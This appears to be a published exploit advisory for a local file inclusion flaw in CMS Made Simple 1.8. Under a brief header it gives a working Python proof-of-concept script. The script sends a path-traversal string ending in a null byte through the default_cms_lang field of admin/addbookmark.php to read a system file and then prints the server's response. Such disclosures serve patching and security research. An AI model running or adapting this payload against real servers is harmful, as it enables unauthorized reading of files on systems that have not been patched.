CMS Made Simple version 1.8 local file inclusion exploit.
1a1daed84fb2084c686a6100600ef7227290c8046b0925b543104077b45fb8b5
# ------------------------------------------------------------------------
# Software................CMS Made Simple 1.8
# Vulnerability...........Local File Inclusion
# Download................http://www.cmsmadesimple.org/
# Release Date............7/11/2010
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://cross-site-scripting.blogspot.com/
# Email...................john.leitch5@gmail.com
# ------------------------------------------------------------------------
#
# --Description--
#
# A local file inclusion vulnerability in CMS Made Simple 1.8 can be
# exploited to include arbitrary files.
#
#
# --PoC--
import httplib, urllib
host = 'localhost'
path = '/cmsms'
lfi = '../' * 32 + 'windows/win.ini\x00'
c = httplib.HTTPConnection(host)
c.request('POST', path + '/admin/addbookmark.php',
urllib.urlencode({ 'default_cms_lang': lfi }),
{ 'Content-type': 'application/x-www-form-urlencoded' })
r = c.getresponse()
print r.status, r.reason
print r.read()